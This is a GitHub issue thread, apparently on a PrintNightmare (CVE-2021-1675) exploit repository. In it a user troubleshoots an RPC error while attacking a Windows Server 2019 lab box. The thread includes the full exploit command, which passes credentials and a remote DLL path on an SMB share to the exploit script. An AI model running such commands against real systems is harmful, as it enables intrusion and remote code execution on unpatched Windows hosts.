-
Notifications
You must be signed in to change notification settings - Fork 581
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
unkown error code: 0x8001011b #61
Comments
Maybe this still helps someone: #59 seems to reference the same issue, so I am cross-referencing it here in case others are looking for an answer. |
Its been patched |
I am attempting the exploit from an Ubuntu 20 server against a standalone Windows Server 2019 box.
I have confirmed:
Protocol: [MS-RPRN]: Print System Remote Protocol
The command I am running to throw the exploit is:
sudo python3 CVE-2021-1675.py 'notadmin:[email protected]' '\\10.209.1.2\share\PrintNightmare.dll'
Output received back is:
I notice in the source code, that this exception is on Line 174:
I manually checked my Win19 to see if I had the particular driver path, but I do not. I'm not sure if the lack of the particular driver could be the issue, but I have little more to go on than the "[-]" error line in my output.
The text was updated successfully, but these errors were encountered: